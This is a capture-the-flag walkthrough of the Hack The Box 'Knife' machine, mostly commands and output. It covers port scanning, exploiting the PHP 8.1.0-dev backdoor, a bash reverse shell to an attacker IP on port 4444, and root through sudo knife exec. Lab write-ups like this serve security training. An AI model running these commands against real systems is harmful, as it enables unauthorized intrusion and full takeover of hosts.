Pages

Search

HTB Knife

$ nmap 10.10.10.242

Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-25 09:57 EDT
Nmap scan report for 10.10.10.242
Host is up (0.061s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 1.11 seconds

$ nmap 10.10.10.242 -p- -v

Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-25 09:58 EDT
Initiating Ping Scan at 09:58
Scanning 10.10.10.242 [2 ports]
Completed Ping Scan at 09:58, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 09:58
Completed Parallel DNS resolution of 1 host. at 09:58, 0.03s elapsed
Initiating Connect Scan at 09:58
Scanning 10.10.10.242 [65535 ports]
Discovered open port 22/tcp on 10.10.10.242
Discovered open port 80/tcp on 10.10.10.242
Completed Connect Scan at 09:58, 28.55s elapsed (65535 total ports)
Nmap scan report for 10.10.10.242
Host is up (0.060s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 28.72 seconds

http://10.10.10.242/

$ whatweb 10.10.10.242

http://10.10.10.242 [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.10.10.242], PHP[8.1.0-dev], Script, Title[Emergent Medical Idea], X-Powered-By[PHP/8.1.0-dev]

$ searchsploit php 8.1.0-dev

-------------------------------------------------------------------------- -------------------------
Exploit Title                                                             |  Path
-------------------------------------------------------------------------- -------------------------
Concrete5 CMS < 8.3.0 - Username / Comments Enumeration                                                                                                                                                    | php/webapps/44194.py
cPanel < 11.25 - Cross-Site Request Forgery (Add User PHP Script)                                                                                                                                          | php/webapps/17330.html
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution                                                                                                                        | php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)                                                                                                                    | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)                                                                                                                           | php/webapps/44448.py
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)                                                                                                      | php/remote/46510.rb
Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution                                                                                                                                             | php/webapps/46452.txt
Drupal < 8.6.9 - REST Module Remote Code Execution                                                                                                                                                         | php/webapps/46459.py
FileRun < 2017.09.18 - SQL Injection                                                                                                                                                                       | php/webapps/42922.py
Fozzcom Shopping < 7.94 / < 8.04 - Multiple Vulnerabilities                                                                                                                                                | php/webapps/15571.txt
FreePBX < 13.0.188 - Remote Command Execution (Metasploit)                                                                                                                                                 | php/remote/40434.rb
IceWarp Mail Server < 11.1.1 - Directory Traversal                                                                                                                                                         | php/webapps/44587.txt
KACE System Management Appliance (SMA) < 9.0.270 - Multiple Vulnerabilities                                                                                                                                | php/webapps/46956.txt
Kaltura < 13.2.0 - Remote Code Execution                                                                                                                                                                   | php/webapps/43028.py
Kaltura Community Edition < 11.1.0-2 - Multiple Vulnerabilities                                                                                                                                            | php/webapps/39563.txt
Micro Focus Secure Messaging Gateway (SMG) < 471 - Remote Code Execution (Metasploit)                                                                                                                      | php/webapps/45083.rb
NPDS < 08.06 - Multiple Input Validation Vulnerabilities                                                                                                                                                   | php/webapps/32689.txt
OPNsense < 19.1.1 - Cross-Site Scripting                                                                                                                                                                   | php/webapps/46351.txt
PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution                                                                                                                                                        | php/webapps/49933.py
Plesk < 9.5.4 - Remote Command Execution                                                                                                                                                                   | php/remote/25986.txt
REDCap < 9.1.2 - Cross-Site Scripting                                                                                                                                                                      | php/webapps/47146.txt
Responsive FileManager < 9.13.4 - Directory Traversal                                                                                                                                                      | php/webapps/45271.txt
Responsive Filemanger <= 9.11.0 - Arbitrary File Disclosure                                                                                                                                                | php/webapps/41272.txt
ShoreTel Connect ONSITE < 19.49.1500.0 - Multiple Vulnerabilities                                                                                                                                          | php/webapps/46666.txt
Western Digital Arkeia < 10.0.10 - Remote Code Execution (Metasploit)                                                                                                                                      | php/remote/28407.rb
WordPress Plugin DZS Videogallery < 8.60 - Multiple Vulnerabilities                                                                                                                                        | php/webapps/39553.txt
Zoho ManageEngine ADSelfService Plus 5.7 < 5702 build - Cross-Site Scripting                                                                                                                               | php/webapps/46815.txt
------------------------------------------------------------------------------- ----------------------
Shellcodes: No Results

$ searchsploit -m php/webapps/49933.py

  Exploit: PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
      URL: https://www.exploit-db.com/exploits/49933
     Path: /usr/share/exploitdb/exploits/php/webapps/49933.py
File Type: HTML document, ASCII text, with CRLF line terminators

Copied to: /home/kali/htb/knife/49933.py

$ python3 49933.py

Enter the full host url:
http://10.10.10.242/

Interactive shell is opened on http://10.10.10.242/ 
Can't acces tty; job crontol turned off.
$

$ id

uid=1000(james) gid=1000(james) groups=1000(james)

Using this exploit we get a reverse but it is not very useful, we can try to get a better one.
https://packetstormsecurity.com/files/162749/PHP-8.1.0-dev-Backdoor-Remote-Command-Injection.html

$ python3 php_8.1.0-dev_exploit.py -u http://10.10.10.242/ -c "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.7/4444 0>&1'"
$ sudo nc -lvnp 4444

[sudo] password for kali: 
listening on [any] 4444 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.242] 46136
bash: cannot set terminal process group (959): Inappropriate ioctl for device
bash: no job control in this shell
james@knife:/$ 

james@knife:/$ ls

ls
bin
boot
cdrom
dev
etc
home
lib
lib32
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
snap
srv
sys
tmp
usr
var

james@knife:/$ cd /home
james@knife:/home$ ls

ls
james

james@knife:/home$ cd james
james@knife:~$ ls

ls
user.txt

james@knife:~$ cat user.txt

1a6aXXXXXXXXXXXXXXXXXXXXXXXXXXXX

james@knife:~$ sudo -l

sudo -l 
Matching Defaults entries for james on knife:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife

https://gtfobins.github.io/gtfobins/knife/

james@knife:/$ sudo /usr/bin/knife exec -E 'exec "/bin/sh -i"'

sudo /usr/bin/knife exec -E 'exec "/bin/sh -i"'
/bin/sh: 0: can't access tty; job control turned off
#

# id

uid=0(root) gid=0(root) groups=0(root)

# cat /root/root.txt

8874XXXXXXXXXXXXXXXXXXXXXXXXXXXX

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *